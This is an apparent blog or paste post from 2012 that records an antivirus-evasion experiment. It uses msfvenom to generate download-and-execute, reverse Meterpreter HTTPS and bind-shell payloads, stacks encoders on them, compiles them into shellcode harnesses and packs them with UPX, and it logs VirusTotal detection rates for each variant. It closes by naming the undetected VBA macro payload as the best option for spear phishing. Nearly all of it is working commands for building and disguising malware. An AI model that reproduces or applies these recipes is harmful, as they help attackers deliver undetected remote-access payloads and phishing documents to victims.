infodox

AV Bypassing Test

Mar 22nd, 2012
Using Shellcode execution as a possible antivirus bypass technique.

Ok, first off, we need to create our malicious "shellcode payload"... I have a few examples below of some possible payloads we could be using.

1. Download and execute.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

2. Reverse Meterpreter HTTPS shell

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

3. Standard Bind Shell

msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

These are the three payloads I will be testing. I chose the encoding at random and just went with the encoding that "felt right". I will not be running them, just uploading them to VirusTotal to show you them compared to their .exe outputs. Bin size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".

Step One: Download and Execute Payload.

Here are the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe

So. We got our binary, and we upload it to the VirusTotal scanning service to see how many detections we get...

Filename: dlexec.exe
Filesize: 72.1 KB
MD5 Hash: aeace18d84af11640a219b2b557ee8ee
Packing: No UPX used.
Detections: 32 / 42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/

Next up we UPX it with this command: upx -9 dlexec.exe

Filesize: 47.0 KB
MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04
Detections: 27 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/

Now, we re-do the whole thing with the ShellCodeExec method, which should be a LOT less detected.

First, we create our shellcode:

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

Now, we pop it into our shellcode harness...
And compile: i586-mingw32msvc-gcc meta.c -o dlcrypt.exe

Filename: dlcrypt.exe
Filesize: 20.1 KB
MD5 Hash: f873ab0d718dbd61b7987c7467ae589c
Packing: No UPX used.
Detections: 14 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/

As you can see, it is a far smaller file with a lot fewer detections. Let's UPX it and see what happens next...

Filename: dlcrypt.exe
Filesize: 14.1 KB
MD5 Hash: 03d634dde3d1e573d99776009e8567f5
Packing: UPX used.
Detections: 18 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/

It would appear UPX is counterproductive to bypassing AV (packers normally are...), so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter Reverse HTTPS payload.


Ok. Reverse HTTPS payload time!

Here are the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse HTTPS meterpreter payload.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe

So. We got our binary, and we upload it to the VirusTotal scanning service to see how many detections we get...

Filename: payload.exe
Filesize: 72.1 KB
MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c
Packing: No UPX used.
Detections: 30 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/

Next up, we UPX it.

Filename: payload.exe
Filesize: 47.0 KB
MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05
Packing: UPX used.
Detections: 26 / 42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/

As you can see, UPX had a positive effect this time. Then I noticed something bloody amazing in the MSFVENOM manual.

exe-small output.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe

No encoding used this time, BTW.

Filename: payload.exe
Filesize: 4.5 KB
MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598
Packing: None
Detections: 13 / 43
Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/

So, let's add some encoding and see what happens...

##

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe

https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/

More detected? WTF? Fine, let's move on...


##

Now, I started looking into alternative outputs... and came up with this.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe

Filename: vba.exe
Filesize: 290.2 KB
MD5 Hash: aedde86916de88b856b22c6e384901bb
Packing: None
Detections: 0 / 42
Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/

This is an MS Office Macro payload. Simply open it in a text editor and follow the instructions...

Final Notes: The MS Office Macro payload is likely the most promising of the lot, as it can be directly embedded into an MS Word document for spear phishing attacks, and seems to bypass things like AV automatically.

Now for ONE LAST TRY: Objdump Pwnage.

root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe
root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh
root@shinigami:/tmp# chmod +x xxd-shellcode.sh
root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt
### Here is where you pop the contents of sc.txt into the shellcode test harness as before ###
root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe

So now we scan our new binary... and see how "bypassing" it is. We can take this further, BTW...

MD5: 7642f0914ebbe62ddc8d64ffe7d52783
File size: 24.1 KB ( 24650 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 43
Link: https://www.virustotal.com/file/90add485b7df79d83588412ce59d76707c27914a2d0d86d731669670c4f6bac3/analysis/1332429280/

Next: We UPX it...

MD5: 963253a72210eb8bd7155137713112ba
File size: 16.6 KB ( 16970 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 41
Link: https://www.virustotal.com/file/6ca78ead1a8ef1c910f921eeab21af48a021db13872a3ad64a6ec6f8c2e228cb/analysis/1332429381/

So then I take this variant, pretend it is micro.exe, and re-encode it...

Result?

PRE UPX:
MD5: a34d634236388762de0801acdd587cc9
File size: 36.1 KB ( 36938 bytes )
File name: helloshell2.exe
File type: Win32 EXE
Detection ratio: 5 / 43
Link: https://www.virustotal.com/file/bc2e51bca3b3895bf59607ab1dbe1bbbfe6fff494642556660d30cf8dae1045e/analysis/1332429607/

POST UPX:
Detections: 10 / 42
Link: https://www.virustotal.com/file/726ced89801acc785f9360d595e7de390c3c19dafeecffcb2db14eb2d00e94b6/analysis/1332429713/


root@shinigami:/tmp# exit


I went up to 10 iterations with no real advantage, but perhaps alternating extra encodings (shikata_ga_nai) may help. I will investigate this later.

~infodox